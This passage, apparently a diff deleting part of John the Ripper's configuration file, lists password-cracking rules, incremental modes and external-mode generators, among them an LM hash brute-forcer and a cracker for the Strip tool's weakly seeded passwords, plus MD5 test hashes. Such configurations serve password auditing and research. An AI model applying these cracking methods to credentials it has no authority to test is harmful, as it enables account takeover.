-;-c (?a c Az"[1-90][0-9][0-9]" <+
-;<[\-9] l A\p[z0]"[a-z][a-z]"
-;<- l ^[a-z] $[a-z]
-
-# Wordlist mode rules
-[List.Rules:Wordlist]
-# Try words as they are
-:
-# Lowercase every pure alphanumeric word
-c >3 !?X l Q
-# Capitalize every pure alphanumeric word
-c (?a >2 !?X c Q
-# Lowercase and pluralize pure alphabetic words
-<* >2 !?A l p
-# Lowercase pure alphabetic words and append '1'
-<* >2 !?A l $1
-# Capitalize pure alphabetic words and append '1'
-c <* >2 !?A c $1
-# Duplicate reasonably short pure alphabetic words (fred -> fredfred)
-<7 >1 !?A l d
-# Lowercase and reverse pure alphabetic words
->3 !?A l M r Q
-# Prefix pure alphabetic words with '1'
->2 !?A l ^1
-# Uppercase pure alphanumeric words
-c >2 !?X u Q M c Q u
-# Lowercase pure alphabetic words and append a digit or simple punctuation
-<* >2 !?A l $[2!37954860.?]
-# Words containing punctuation, which is then squeezed out, lowercase
-/?p @?p >3 l
-# Words with vowels removed, lowercase
-/?v @?v >3 l
-# Words containing whitespace, which is then squeezed out, lowercase
-/?w @?w >3 l
-# Capitalize and duplicate short pure alphabetic words (fred -> FredFred)
-c <7 >1 !?A c d
-# Capitalize and reverse pure alphabetic words (fred -> derF)
-c <+ >2 !?A c r
-# Reverse and capitalize pure alphabetic words (fred -> Derf)
-c >2 !?A l M r Q c
-# Lowercase and reflect pure alphabetic words (fred -> fredderf)
-<7 >1 !?A l d M 'l f Q
-# Uppercase the last letter of pure alphabetic words (fred -> freD)
-c <+ >2 !?A l M r Q c r
-# Prefix pure alphabetic words with '2' or '4'
->2 !?A l ^[24]
-# Capitalize pure alphabetic words and append a digit or simple punctuation
-c <* >2 !?A c $[2!3957468.?0]
-# Prefix pure alphabetic words with digits
->2 !?A l ^[379568]
-# Capitalize and pluralize pure alphabetic words of reasonable length
-c <* >2 !?A c p
-# Lowercase/capitalize pure alphabetic words of reasonable length and convert:
-# crack -> cracked, crack -> cracking
-[:c] <* >2 !?A \p1[lc] M [PI] Q
-# Try the second half of split passwords
-s x**
-s-c x** M l Q
-
-
-# Prepend "pass"
-A0"[pP][aA][sS][sS]"
-
-
-# Case toggler for cracking MD4-based NTLM hashes (with the contributed patch)
-# given already cracked DES-based LM hashes.
-# Rename this section to [List.Rules:Wordlist] to activate it.
-[List.Rules:NT]
-:
-c T0Q
-c T1QT[z0]
-c T2QT[z0]T[z1]
-c T3QT[z0]T[z1]T[z2]
-c T4QT[z0]T[z1]T[z2]T[z3]
-c T5QT[z0]T[z1]T[z2]T[z3]T[z4]
-c T6QT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]
-c T7QT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]
-c T8QT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]
-c T9QT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]T[z8]
-c TAQT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]T[z8]T[z9]
-c TBQT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]T[z8]T[z9]T[zA]
-c TCQT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]T[z8]T[z9]T[zA]T[zB]
-c TDQT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]T[z8]T[z9]T[zA]T[zB]T[zC]
-
-# Incremental modes
-[Incremental:All]
-File = $JOHN/all.chr
-MinLen = 0
-MaxLen = 8
-CharCount = 95
-
-
-[Incremental:All4]
-File = $JOHN/all.chr
-MinLen = 0
-MaxLen = 4
-CharCount = 95
-
-[Incremental:Alpha]
-File = $JOHN/alpha.chr
-MinLen = 1
-MaxLen = 8
-CharCount = 26
-
-[Incremental:Digits]
-File = $JOHN/digits.chr
-MinLen = 1
-MaxLen = 8
-CharCount = 10
-
-[Incremental:Digits5]
-File = $JOHN/digits.chr
-MinLen = 1
-MaxLen = 5
-CharCount = 10
-
-[Incremental:Alnum]
-File = $JOHN/alnum.chr
-MinLen = 1
-MaxLen = 8
-CharCount = 36
-
-[Incremental:LanMan]
-File = $JOHN/lanman.chr
-MinLen = 0
-MaxLen = 7
-CharCount = 69
-
-# Some pre-defined word filters
-[List.External:Filter_Alpha]
-void filter()
-{
-	int i, c;
-
-	i = 0;
-	while (c = word[i++])
-	if (c < 'a' || c > 'z') {
-		word = 0; return;
-	}
-}
-
-[List.External:Filter_Digits]
-void filter()
-{
-	int i, c;
-
-	i = 0;
-	while (c = word[i++])
-	if (c < '0' || c > '9') {
-		word = 0; return;
-	}
-}
-
-[List.External:Filter_Alnum]
-void filter()
-{
-	int i, c;
-
-	i = 0;
-	while (c = word[i++])
-	if ((c < 'a' || c > 'z') && (c < '0' || c > '9')) {
-		word = 0; return;
-	}
-}
-
-[List.External:Filter_No_Cap_or_Symbols]
-void filter()
-{
-	int i, c;
-
-	i = 0;
-	while (c = word[i++])
-	if ((c < 'a' || c > 'z') && (c < '0' || c > '9')) {
-		return;
-	}
-	word = 0; return;
-}
-
-[List.External:Filter_LanMan]
-void filter()
-{
-	int i, c;
-
-	word[7] = 0;			// Truncate at 7 characters
-
-	i = 0;				// Convert to uppercase
-	while (c = word[i]) {
-		if (c >= 'a' && c <= 'z') word[i] &= 0xDF;
-		i++;
-	}
-}
-
-# A simple cracker for LM hashes
-[List.External:LanMan]
-int length;				// Current length
-
-void init()
-{
-	word[0] = 'A' - 1;		// Start with "A"
-	word[length = 1] = 0;
-}
-
-void generate()
-{
-	int i;
-
-	i = length - 1;			// Start from the last character
-	while (++word[i] > 'Z')		// Try to increase it
-	if (i)				// Overflow here, any more positions?
-		word[i--] = 'A';	// Yes, move to the left, and repeat
-	else				// No
-	if (length < 7) {
-		word[i = ++length] = 0;	// Switch to the next length
-		while (i--)
-			word[i] = 'A';
-		return;
-	} else {
-		word = 0; return;	// We're done
-	}
-}
-
-void restore()
-{
-	length = 0;			// Calculate the length
-	while (word[length]) length++;
-}
-
-# Simple and well-commented, yet useful external mode example
-[List.External:Double]
-/*
- * This cracking mode tries all the possible duplicated lowercase alphabetic
- * "words" of up to 8 characters long.  Since word halves are the same, it
- * only has to try about 500,000 words.
- */
-
-/* Global variables: current length and word */
-int length, current[9];
-
-/* Called at startup to initialize the global variables */
-void init()
-{
-	int i;
-
-	i = length = 2;			// Start with 4 character long words
-	while (i--) current[i] = 'a';	// Set our half-word to "aa"
-}
-
-/* Generates a new word */
-void generate()
-{
-	int i;
-
-/* Export last generated word, duplicating it at the same time; here "word"
- * is a pre-defined external variable. */
-	word[(i = length) << 1] = 0;
-	while (i--) word[length + i] = word[i] = current[i];
-
-/* Generate a new word */
-	i = length - 1;			// Start from the last character
-	while (++current[i] > 'z')	// Try to increase it
-	if (i)				// Overflow here, any more positions?
-		current[i--] = 'a';	// Yes, move to the left, and repeat
-	else {				// No
-		current = 0;		// Request a length switch
-		break;			// Break out of the loop
-	}
-
-/* Switch to the next length, unless we were generating 8 character long
- * words already. */
-	if (!current && length < 4) {
-		i = ++length;
-		while (i--) current[i] = 'a';
-	}
-}
-
-/* Called when restoring an interrupted session */
-void restore()
-{
-	int i;
-
-/* Import the word back */
-	i = 0;
-	while (current[i] = word[i]) i++;
-
-/* ...and calculate the half-word length */
-	length = i >> 1;
-}
-
-# Trivial parallel processing example
-[List.External:Parallel]
-/*
- * This word filter makes John process some of the words only, for running
- * multiple instances on different CPUs.  It can be used with any cracking
- * mode except for "single crack".  Note: this is not a good solution, but
- * is just an example of what can be done with word filters.
- */
-
-int node, total;			// This node's number, and node count
-int number;				// Current word number
-
-void init()
-{
-	node = 1; total = 2;		// Node 1 of 2, change as appropriate
-	number = node - 1;		// Speedup the filter a bit
-}
-
-void filter()
-{
-	if (number++ % total)		// Word for a different node?
-		word = 0;		// Yes, skip it
-}
-
-# Strip 0.5 ("Secure Tool for Recalling Important Passwords") cracker,
-# based on analysis done by Thomas Roessler and Ian Goldberg.  This will
-# crack passwords you may have generated with Strip; other uses of Strip
-# are unaffected.
-[List.External:Strip]
-int minlength, maxlength, mintype, maxtype;
-int crack_seed, length, type;
-int count, charset[128];
-
-void init()
-{
-	int c;
-
-/* Password lengths to try; Strip can generate passwords of 4 to 16
- * characters, but traditional crypt(3) hashes are limited to 8. */
-	minlength = 4;	// 4
-	maxlength = 8;	// 16
-
-/* Password types to try (Numeric, Alpha-Num, Alpha-Num w/ Meta). */
-	mintype = 0;	// 0
-	maxtype = 2;	// 2
-
-	crack_seed = 0x10000;
-	length = minlength - 1;
-	type = mintype;
-
-	count = 0;
-	c = '0'; while (c <= '9') charset[count++] = c++;
-}
-
-void generate()
-{
-	int seed, random;
-	int i, c;
-
-	if (crack_seed > 0xffff) {
-		crack_seed = 0;
-
-		if (++length > maxlength) {
-			length = minlength;
-
-			if (++type > maxtype) {
-				word[0] = 0;
-				return;
-			}
-		}
-
-		count = 10;
-		if (type >= 1) {
-			c = 'a'; while (c <= 'f') charset[count++] = c++;
-			c = 'h'; while (c <= 'z') charset[count++] = c++;
-			c = 'A'; while (c <= 'Z') charset[count++] = c++;
-		}
-		if (type == 2) {
-			charset[count++] = '!';
-			c = '#'; while (c <= '&') charset[count++] = c++;
-			c = '('; while (c <= '/') charset[count++] = c++;
-			c = '<'; while (c <= '>') charset[count++] = c++;
-			charset[count++] = '?'; charset[count++] = '@';
-			charset[count++] = '['; charset[count++] = ']';
-			charset[count++] = '^'; charset[count++] = '_';
-			c = '{'; while (c <= '~') charset[count++] = c++;
-		}
-	}
-
-	seed = (crack_seed++ << 16 >> 16) * 22695477 + 1;
-
-	i = 0;
-	while (i < length) {
-		random = ((seed = seed * 22695477 + 1) >> 16) & 0x7fff;
-		word[i++] = charset[random % count];
-	}
-
-	word[i] = 0;
-}
-
-# Try sequences of adjacent keys on a keyboard as candidate passwords
-[List.External:Keyboard]
-int maxlength, length;	// Maximum password length to try, current length
-int fuzz;		// The desired "fuzz factor", either 0 or 1
-int id[15];		// Current character indices for each position
-int m[0x400], mc[0x80];	// The keys matrix, counts of adjacent keys
-int f[0x40], fc;	// Characters for the first position, their count
-
-void init()
-{
-	int minlength;
-	int i, j, c, p;
-	int k[0x40];
-
-	minlength = 1;	// Initial password length to try
-	maxlength = 15;	// Maximum password length to try, up to 15
-	fuzz = 1;	// "Fuzz factor", set to 0 for much quicker runs
-
-/*
- * This defines the keyboard layout, by default for a QWERTY keyboard.
- * Please note that the sizes of m[] and mc[] arrays assume 7-bit
- * characters and will need to be doubled for 8-bit characters such as
- * umlauts.
- */
-	i = 0; while (i < 0x40) k[i++] = 0;
-	k[0] = '`';
-	i = 0; while (++i <= 9) k[i] = '0' + i;
-	k[10] = '0'; k[11] = '-'; k[12] = '=';
-	k[0x11] = 'q'; k[0x12] = 'w'; k[0x13] = 'e'; k[0x14] = 'r';
-	k[0x15] = 't'; k[0x16] = 'y'; k[0x17] = 'u'; k[0x18] = 'i';
-	k[0x19] = 'o'; k[0x1a] = 'p'; k[0x1b] = '['; k[0x1c] = ']';
-	k[0x1d] = '\\';
-	k[0x21] = 'a'; k[0x22] = 's'; k[0x23] = 'd'; k[0x24] = 'f';
-	k[0x25] = 'g'; k[0x26] = 'h'; k[0x27] = 'j'; k[0x28] = 'k';
-	k[0x29] = 'l'; k[0x2a] = ';'; k[0x2b] = '\'';
-	k[0x31] = 'z'; k[0x32] = 'x'; k[0x33] = 'c'; k[0x34] = 'v';
-	k[0x35] = 'b'; k[0x36] = 'n'; k[0x37] = 'm'; k[0x38] = ',';
-	k[0x39] = '.'; k[0x3a] = '/';
-
-	i = 0; while (i < 0x80) mc[i++] = 0;
-	fc = 0;
-
-	/* rows */
-	c = 0;
-	i = 0;
-	while (i < 0x40) {
-		p = c;
-		c = k[i++];
-		if (!c) continue;
-		f[fc++] = c;
-		if (!p) continue;
-		m[(c << 3) + mc[c]++] = p;
-		m[(p << 3) + mc[p]++] = c;
-	}
-	f[fc] = 0;
-
-	/* columns */
-	i = 0;
-	while (i < 0x30) {
-		p = k[i++];
-		if (!p) continue;
-		j = 1 - fuzz;
-		while (j <= 1 + fuzz) {
-			c = k[i + 0x10 - j++];
-			if (!c) continue;
-			m[(c << 3) + mc[c]++] = p;
-			m[(p << 3) + mc[p]++] = c;
-		}
-	}
-
-	id[0] = 0;
-	length = minlength;
-}
-
-void generate()
-{
-	int i, p, maxcount;
-
-	word[i = 0] = p = f[id[0]];
-	while (++i < length)
-		word[i] = p = m[(p << 3) + id[i]];
-	word[i--] = 0;
-
-	if (i) maxcount = mc[word[i - 1]]; else maxcount = fc;
-	while (++id[i] >= maxcount) {
-		if (!i) {
-			if (length < maxlength) {
-				id[0] = 0;
-				id[length++] = 0;
-			}
-			return;
-		}
-		id[i--] = 0;
-		if (i) maxcount = mc[word[i - 1]]; else maxcount = fc;
-	}
-}
-
-void restore()
-{
-	int i;
-
-	/* Calculate the length */
-	length = 0;
-	while (word[length]) length++;
-
-	/* Infer the first character index */
-	i = -1;
-	while (++i < fc) {
-		if (f[i] == word[0]) {
-			id[0] = i;
-			break;
-		}
-	}
-
-	/* This sample can be enhanced to infer the rest of the indices here */
-}
-
-# Generic implementation of "dumb" exhaustive search, given a range of lengths
-# and an arbitrary charset.  This is pre-configured to try 8-bit characters
-# against LM hashes, which is only reasonable to do for very short password
-# half lengths.
-[List.External:DumbForce]
-int maxlength;		// Maximum password length to try
-int last;		// Last character position, zero-based
-int lastid;		// Character index in the last position
-int id[0x7f];		// Current character indices for other positions
-int charset[0x100], c0;	// Character set
-
-void init()
-{
-	int minlength;
-	int i, c;
-
-	minlength = 1;	// Initial password length to try, must be at least 1
-	maxlength = 7;	// Must be at least same as minlength
-
-/*
- * This defines the character set.
- *
- * Let's say, we want to try TAB, all non-control ASCII characters, and all
- * 8-bit characters, including the 8-bit terminal controls range (as these are
- * used as regular national characters with some 8-bit encodings), but except
- * for known terminal controls (risky for the terminal we may be running on).
- *
- * Also, let's say our hashes are case-insensitive, so skip lowercase letters
- * (this is right for LM hashes).
- */
-	i = 0;
-	charset[i++] = 9;		// Add horizontal TAB (ASCII 9), then
-	c = ' ';			// start with space (ASCII 32) and
-	while (c < 'a')			// proceed till lowercase 'a'
-		charset[i++] = c++;
-	c = 'z' + 1;			// Skip lowercase letters and
-	while (c <= 0x7e)		// proceed for all printable ASCII
-		charset[i++] = c++;
-	c++;				// Skip DEL (ASCII 127) and
-	while (c < 0x84)		// proceed over 8-bit codes till IND
-		charset[i++] = c++;
-	charset[i++] = 0x86;		// Skip IND (84 hex) and NEL (85 hex)
-	charset[i++] = 0x87;
-	c = 0x89;			// Skip HTS (88 hex)
-	while (c < 0x8d)		// Proceed till RI (8D hex)
-		charset[i++] = c++;
-	c = 0x91;			// Skip RI, SS2, SS3, DCS
-	while (c < 0x96)		// Proceed till SPA (96 hex)
-		charset[i++] = c++;
-	charset[i++] = 0x99;		// Skip SPA, EPA, SOS
-	c = 0xa0;			// Skip DECID, CSI, ST, OSC, PM, APC
-	while (c <= 0xff)		// Proceed with the rest of 8-bit codes
-		charset[i++] = c++;
-
-/* Zero-terminate it, and cache the first character */
-	charset[i] = 0;
-	c0 = charset[0];
-
-	last = minlength - 1;
-	i = 0;
-	while (i <= last) {
-		id[i] = 0;
-		word[i++] = c0;
-	}
-	lastid = -1;
-	word[i] = 0;
-}
-
-void generate()
-{
-	int i;
-
-/* Handle the typical case specially */
-	if (word[last] = charset[++lastid]) return;
-
-	lastid = 0;
-	word[i = last] = c0;
-	while (i--) {			// Have a preceding position?
-		if (word[i] = charset[++id[i]]) return;
-		id[i] = 0;
-		word[i] = c0;
-	}
-
-	if (++last < maxlength) {	// Next length?
-		id[last] = lastid = 0;
-		word[last] = c0;
-		word[last + 1] = 0;
-	} else				// We're done
-		word = 0;
-}
-
-void restore()
-{
-	int i, c;
-
-/* Calculate the current length and infer the character indices */
-	last = 0;
-	while (c = word[last]) {
-		i = 0; while (charset[i] != c && charset[i]) i++;
-		if (!charset[i]) i = 0;	// Not found
-		id[last++] = i;
-	}
-	lastid = id[--last];
-}
-
-# Generic implementation of exhaustive search for a partially-known password.
-# This is pre-configured for length 8, lowercase and uppercase letters in the
-# first 4 positions (52 different characters), and digits in the remaining 4
-# positions - however, the corresponding part of init() may be modified to use
-# arbitrary character sets or even fixed characters for each position.
-[List.External:KnownForce]
-int last;		// Last character position, zero-based
-int lastofs;		// Last character position offset into charset[]
-int lastid;		// Current character index in the last position
-int id[0x7f];		// Current character indices for other positions
-int charset[0x7f00];	// Character sets, 0x100 elements for each position
-
-void init()
-{
-	int length;
-	int pos, ofs, i, c;
-
-	length = 8;	// Password length to try
-
-/* This defines the character sets for different character positions */
-	pos = 0;
-	while (pos < 4) {
-		ofs = pos++ << 8;
-		i = 0;
-		c = 'a';
-		while (c <= 'z')
-			charset[ofs + i++] = c++;
-		c = 'A';
-		while (c <= 'Z')
-			charset[ofs + i++] = c++;
-		charset[ofs + i] = 0;
-	}
-	while (pos < length) {
-		ofs = pos++ << 8;
-		i = 0;
-		c = '0';
-		while (c <= '9')
-			charset[ofs + i++] = c++;
-		charset[ofs + i] = 0;
-	}
-
-	last = length - 1;
-	pos = -1;
-	while (++pos <= last)
-		word[pos] = charset[id[pos] = pos << 8];
-	lastid = (lastofs = last << 8) - 1;
-	word[pos] = 0;
-}
-
-void generate()
-{
-	int pos;
-
-/* Handle the typical case specially */
-	if (word[last] = charset[++lastid]) return;
-
-	word[pos = last] = charset[lastid = lastofs];
-	while (pos--) {			// Have a preceding position?
-		if (word[pos] = charset[++id[pos]]) return;
-		word[pos] = charset[id[pos] = pos << 8];
-	}
-
-	word = 0;			// We're done
-}
-
-void restore()
-{
-	int i, c;
-
-/* Calculate the current length and infer the character indices */
-	last = 0;
-	while (c = word[last]) {
-		i = lastofs = last << 8;
-		while (charset[i] != c && charset[i]) i++;
-		if (!charset[i]) i = lastofs; // Not found
-		id[last++] = i;
-	}
-	lastid = id[--last];
-}
-
-# A variation of KnownForce configured to try likely date and time strings.
-[List.External:DateTime]
-int last;		// Last character position, zero-based
-int lastofs;		// Last character position offset into charset[]
-int lastid;		// Current character index in the last position
-int id[0x7f];		// Current character indices for other positions
-int charset[0x7f00];	// Character sets, 0x100 elements for each position
-
-void init()
-{
-	int length;
-	int pos, ofs, i, c;
-
-	length = 8;	// Must be one of: 4, 5, 7, 8
-
-/* This defines the character sets for different character positions */
-	pos = 0;
-	while (pos < length - 6) {
-		ofs = pos++ << 8;
-		i = 0;
-		c = '0';
-		while (c <= '9')
-			charset[ofs + i++] = c++;
-		charset[ofs + i] = 0;
-	}
-	if (pos) {
-		ofs = pos++ << 8;
-		charset[ofs] = '/';
-		charset[ofs + 1] = '.';
-		charset[ofs + 2] = ':';
-		charset[ofs + 3] = 0;
-	}
-	while (pos < length - 3) {
-		ofs = pos++ << 8;
-		i = 0;
-		c = '0';
-		while (c <= '9')
-			charset[ofs + i++] = c++;
-		charset[ofs + i] = 0;
-	}
-	ofs = pos++ << 8;
-	charset[ofs] = '/';
-	charset[ofs + 1] = '.';
-	charset[ofs + 2] = ':';
-	charset[ofs + 3] = 0;
-	while (pos < length) {
-		ofs = pos++ << 8;
-		i = 0;
-		c = '0';
-		while (c <= '9')
-			charset[ofs + i++] = c++;
-		charset[ofs + i] = 0;
-	}
-
-	last = length - 1;
-	pos = -1;
-	while (++pos <= last)
-		word[pos] = charset[id[pos] = pos << 8];
-	lastid = (lastofs = last << 8) - 1;
-	word[pos] = 0;
-}
-
-void generate()
-{
-	int pos;
-
-/* Handle the typical case specially */
-	if (word[last] = charset[++lastid]) return;
-
-	word[pos = last] = charset[lastid = lastofs];
-	while (pos--) {			// Have a preceding position?
-		if (word[pos] = charset[++id[pos]]) return;
-		word[pos] = charset[id[pos] = pos << 8];
-	}
-
-	word = 0;			// We're done
-}
-
-void restore()
-{
-	int i, c;
-
-/* Calculate the current length and infer the character indices */
-	last = 0;
-	while (c = word[last]) {
-		i = lastofs = last << 8;
-		while (charset[i] != c && charset[i]) i++;
-		if (!charset[i]) i = lastofs; // Not found
-		id[last++] = i;
-	}
-	lastid = id[--last];
-}
-
-# Try strings of repeated characters.
-[List.External:Repeats]
-int minlength, maxlength, minc, maxc, length, c;
-
-void init()
-{
-	minlength = 1;
-	maxlength = 72;
-	minc = 0x20;
-	maxc = 0xff;
-
-	length = minlength; c = minc;
-}
-
-void generate()
-{
-	int i;
-
-	i = 0;
-	while (i < length)
-		word[i++] = c;
-	word[i] = 0;
-
-	if (c++ < maxc)
-		return;
-
-	c = minc;
-	if (++length > maxlength)
-		c = 0; // Will NUL out the next "word" and thus terminate
-}
-
-# Generate candidate passwords from many small subsets of characters from a
-# much larger full character set.  This will test for passwords containing too
-# few different characters.  As currently implemented, this code will produce
-# some duplicates, although their number is relatively small when the maximum
-# number of different characters (the maxdiff setting) is significantly lower
-# than the maximum length (the maxlength setting).  Nevertheless, you may want
-# to pass the resulting candidate passwords through "unique" if you intend to
-# test them against hashes that are salted and/or of a slow to compute type.
-[List.External:Subsets]
-int minlength;		// Minimum password length to try
-int maxlength;		// Maximum password length to try
-int startdiff;		// Initial number of characters in a subset to try
-int maxdiff;		// Maximum number of characters in a subset to try
-int last;		// Last character position, zero-based
-int lastid;		// Character index in the last position
-int id[0x7f];		// Current character indices for other positions
-int subset[0x100], c0;	// Current subset
-int subcount;		// Number of characters in the current subset
-int subid[0x100];	// Indices into charset[] of characters in subset[]
-int charset[0x100];	// Full character set
-int charcount;		// Number of characters in the full charset
-
-void init()
-{
-	int i, c;
-
-	minlength = 1;	// Minimum password length to try, must be at least 1
-	maxlength = 8;	// Must be at least same as minlength
-
-	startdiff = 1;	// Initial number of different characters to try
-	maxdiff = 3;	// Maximum number of different characters to try
-
-/* This defines the character set */
-	i = 0;
-	c = 0x20;
-	while (c <= 0x7e)
-		charset[i++] = c++;
-
-	if (maxdiff > (charcount = i))
-		maxdiff = i;
-	if (maxdiff > maxlength)
-		maxdiff = maxlength;
-
-/*
- * Initialize the variables such that generate() gets to its "next subset"
- * code, which will initialize everything for real.
- */
-	subcount = (i = startdiff) - 1;
-	while (i--)
-		subid[i] = charcount;
-	subset[0] = c0 = 0;
-	last = maxlength - 1;
-	lastid = -1;
-}
-
-void generate()
-{
-	int i;
-
-/* Handle the typical case specially */
-	if (word[last] = subset[++lastid]) return;
-
-	lastid = 0;
-	word[i = last] = c0;
-	while (i--) {			// Have a preceding position?
-		if (word[i] = subset[++id[i]]) return;
-		id[i] = 0;
-		word[i] = c0;
-	}
-
-	if (++last < maxlength) {	// Next length?
-		id[last] = lastid = 0;
-		word[last] = c0;
-		word[last + 1] = 0;
-		return;
-	}
-
-/* Next subset */
-	if (subcount) {
-		int j;
-		i = subcount - 1;
-		j = charcount;
-		while (++subid[i] >= j) {
-			if (i--) {
-				j--;
-				continue;
-			}
-			subid[i = 0] = 0;
-			subset[++subcount] = 0;
-			break;
-		}
-	} else {
-		subid[i = 0] = 0;
-		subset[++subcount] = 0;
-	}
-	subset[i] = charset[subid[i]];
-	while (++i < subcount)
-		subset[i] = charset[subid[i] = subid[i - 1] + 1];
-
-	if (subcount > maxdiff) {
-		word = 0;		// Done
-		return;
-	}
-
-/*
- * We won't be able to fully use the subset if the length is smaller than the
- * character count.  We assume that we've tried all smaller subsets before, so
- * we don't bother with such short lengths.
- */
-	if (minlength < subcount)
-		last = subcount - 1;
-	else
-		last = minlength - 1;
-	c0 = subset[0];
-	i = 0;
-	while (i <= last) {
-		id[i] = 0;
-		word[i++] = c0;
-	}
-	lastid = 0;
-	word[i] = 0;
-}
-
-# Simple password policy matching: require at least one digit.
-[List.External:AtLeast1-Simple]
-void filter()
-{
-	int i, c;
-
-	i = 0;
-	while (c = word[i++])
-		if (c >= '0' && c <= '9')
-			return; // Found at least one suitable character, good
-
-	word = 0; // No suitable characters found, skip this "word"
-}
-
-# The same password policy implemented in a more efficient and more generic
-# fashion (easy to expand to include other "sufficient" characters as well).
-[List.External:AtLeast1-Generic]
-int mask[0x100];
-
-void init()
-{
-	int c;
-
-	mask[0] = 0; // Terminate the loop in filter() on NUL
-	c = 1;
-	while (c < 0x100)
-		mask[c++] = 1; // Continue looping in filter() on most chars
-
-	c = '0';
-	while (c <= '9')
-		mask[c++] = 0; // Terminate the loop in filter() on digits
-}
-
-void filter()
-{
-	int i;
-
-	i = -1;
-	while (mask[word[++i]])
-		continue;
-	if (word[i])
-		return; // Found at least one suitable character, good
-
-	word = 0; // No suitable characters found, skip this "word"
-}
-
-# An efficient and fairly generic password policy matcher.  The policy to match
-# is specified in the check at the end of filter() and in mask[].  For example,
-# lowercase and uppercase letters may be treated the same by initializing the
-# corresponding mask[] elements to the same value, then adjusting the value to
-# check "seen" for accordingly.
-[List.External:Policy]
-int mask[0x100];
-
-void init()
-{
-	int c;
-
-	mask[0] = 0x100;
-	c = 1;
-	while (c < 0x100)
-		mask[c++] = 0x200;
-
-	c = 'a';
-	while (c <= 'z')
-		mask[c++] = 1;
-	c = 'A';
-	while (c <= 'Z')
-		mask[c++] = 2;
-	c = '0';
-	while (c <= '9')
-		mask[c++] = 4;
-}
-
-void filter()
-{
-	int i, seen;
-
-/*
- * This loop ends when we see NUL (sets 0x100) or a disallowed character
- * (sets 0x200).
- */
-	i = -1; seen = 0;
-	while ((seen |= mask[word[++i]]) < 0x100)
-		continue;
-
-/*
- * We should have seen at least one character of each type (which "add up"
- * to 7) and then a NUL (adds 0x100), but not any other characters (would
- * add 0x200).  The length must be 8.
- */
-	if (seen != 0x107 || i != 8)
-		word = 0; // Does not conform to policy
-}
-
-# Append the Luhn algorithm digit to arbitrary all-digit strings.  Optimized
-# for speed, not for size nor simplicity.  The primary optimization trick is to
-# compute the length and four sums in parallel (in two SIMD'ish variables).
-# Then whether the length is even or odd determines which two of the four sums
-# are actually used.  Checks for non-digits and for NUL are packed into the
-# SIMD'ish bitmasks as well.
-[List.External:AppendLuhn]
-int map1[0x100], map2[0x1fff];
-
-void init()
-{
-	int i;
-
-	map1[0] = ~0x7fffffff;
-	i = 1;
-	while (i < 0x100)
-		map1[i++] = ~0x7effffff;
-	i = -1;
-	while (++i < 10)
-		map1['0' + i] = i + ((i * 2 % 10 + i / 5) << 12);
-	i = -1;
-	while (++i < 0x1fff) {
-		if (i % 10)
-			map2[i] = '9' + 1 - i % 10;
-		else
-			map2[i] = '0';
-	}
-}
-
-void filter()
-{
-	int i, o, e;
-
-	i = o = e = 0;
-	while ((o += map1[word[i++]]) >= 0) {
-		if ((e += map1[word[i++]]) >= 0)
-			continue;
-		if (e & 0x01000000)
-			return; // Not all-digit, leave unmodified
-		word[i--] = 0;
-		word[i] = map2[(e & 0xfff) + (o >> 12)];
-		return;
-	}
-	if (o & 0x01000000)
-		return; // Not all-digit, leave unmodified
-	word[i--] = 0;
-	word[i] = map2[(o & 0xfff) + (e >> 12)];
-}
-
-# Here are some examples of GENERIC-MD5.
-# Please refer to doc/MD5_GENERIC for documentation on how to set these up.
-
-####################################################################
-# Simple GENERIC-MD5 type for md5($p)^^4  (i.e. 4 steps of md5 recursively)
-####################################################################
-[List.Generic:md5_gen(1001)]
-# expression shown will be the string:   md5_gen(1001) md5(md5(md5(md5($p))))
-Expression=md5(md5(md5(md5($p))))
-Flag=MGF_KEYS_INPUT
-# here is the optimized 'script' to perform the md5 4 times on itself.
-Func=MD5GenBaseFunc__crypt
-Func=MD5GenBaseFunc__clean_input2
-Func=MD5GenBaseFunc__append_from_last_output_to_input2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt_in2_to_out1
-Test=md5_gen(1001)57200e13b490d4ae47d5e19be026b057:test1
-Test=md5_gen(1001)c6cc44f9e7fb7efcde62ba2e627a49c6:thatsworking
-Test=md5_gen(1001)0ae9549604e539a249c1fa9f5e5fb73b:test3
-
-####################################################################
-# Simple GENERIC-MD5 type for md5($p)^^5  (i.e. 5 steps of md5 recursively)
-####################################################################
-[List.Generic:md5_gen(1002)]
-# expression shown will be the string:   md5_gen(1002) md5(md5(md5(md5(md5($p)))))
-Expression=md5(md5(md5(md5(md5($p)))))
-Flag=MGF_KEYS_INPUT
-# here is the optimized 'script' to perform the md5 5 times on itself.
-Func=MD5GenBaseFunc__crypt
-Func=MD5GenBaseFunc__clean_input2
-Func=MD5GenBaseFunc__append_from_last_output_to_input2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt_in2_to_out1
-# These are test strings for this format.
-Test=md5_gen(1002)25de8cd0b0cf69c5b5bc19c8ee64adab:test1
-Test=md5_gen(1002)a0b535420ea47849f7c2cc09a3ad0ac3:thatsworking
-Test=md5_gen(1002)4cb029bd5b4ef79f785ca685caf17bf8:test3
-
-####################################################################
-# Simple GENERIC-MD5 type for md5(md5($p).md5($p))
-####################################################################
-[List.Generic:md5_gen(1003)]
-# expression shown will be the string:   md5_gen(1003) md5(md5($p).md5($p))
-Expression=md5(md5($p).md5($p))
